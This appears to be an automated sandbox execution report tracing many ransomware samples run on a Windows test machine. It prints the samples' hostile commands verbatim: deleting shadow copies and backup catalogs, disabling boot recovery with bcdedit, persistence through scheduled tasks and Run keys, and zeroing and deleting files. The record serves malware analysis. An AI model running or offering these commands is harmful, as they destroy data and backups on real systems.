HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 3384 wrote to memory of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 4304 wrote to memory of 4828 4304 cmd.exe Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe PID 4304 wrote to memory of 4828 4304 cmd.exe Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe PID 4304 wrote to memory of 4828 4304 cmd.exe Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe PID 4304 wrote to memory of 3620 4304 cmd.exe Trojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe -
outlook_win_path 1 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00381.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 10084⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"4⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"4⤵
- Executes dropped EXE
PID:2524 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3328 -
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:11652 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe:Zone.Identifier"4⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:728 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe"C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7448 -
C:\Users\Admin\AppData\Roaming\MozillaUpdate.exe"C:\Users\Admin\AppData\Roaming\MozillaUpdate.exe"5⤵PID:6060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Roaming\MozillaUpdate.exe:Zone.Identifier"6⤵PID:14060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:9572
-
C:\Users\Admin\AppData\Roaming\MozillaUpdate.exe"C:\Users\Admin\AppData\Roaming\MozillaUpdate.exe"6⤵PID:10564
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier"4⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:4568 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier"4⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:1552 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe"HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- NTFS ADS
PID:9252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe > nul5⤵PID:12108
-
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=13/ct=23/rt=0 --dh 2068 --st 17306735405⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:12052 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:552 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CyefyP" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAE38.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:8964 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe"C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10908 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe3⤵
- Modifies WinLogon for persistence
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exeHEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4524 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exeTrojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4520 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exeTrojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exeTrojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2580 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:10896
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:9312
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:13224 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:11432
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:2820
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:7956 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:8820
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:4060
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5052 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeC:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
PID:2156 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:3016
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:7108
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:2164 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:8472
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:10292
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1224 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:11068
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:5832
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exeTrojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 2364⤵
- Program crash
PID:5096 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4828 -
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:5020 -
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:6448 -
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:6912 -
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:11988 -
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:6956
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:7992
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:13348
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:13444
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:13368
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:13456
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:6616
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:9848
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:13232
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:14084
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:12916
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:13712
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:8568
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:6736
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:13464
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:13424
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:3364
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵PID:6480
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵PID:4040
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵PID:436
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exeTrojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookAW
PID:3620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 4724⤵
- Program crash
PID:448 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3728 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:4224
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2396 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:8260 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:8664 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:5560 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:7748 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe" & Del /f /q "C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10296 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11536 -
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe"5⤵PID:7944
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 7084⤵
- Program crash
PID:6660 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe"C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe" g4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 6525⤵
- Program crash
PID:5528 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "HG6irydd" /TR "C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe" /SC ONLOGON /RL HIGHEST /F4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:7836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:7400
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:11692
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:10024
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:4544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:6816
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:2032
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:11808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:13500
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:2628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:12388
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:13628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:12464
-
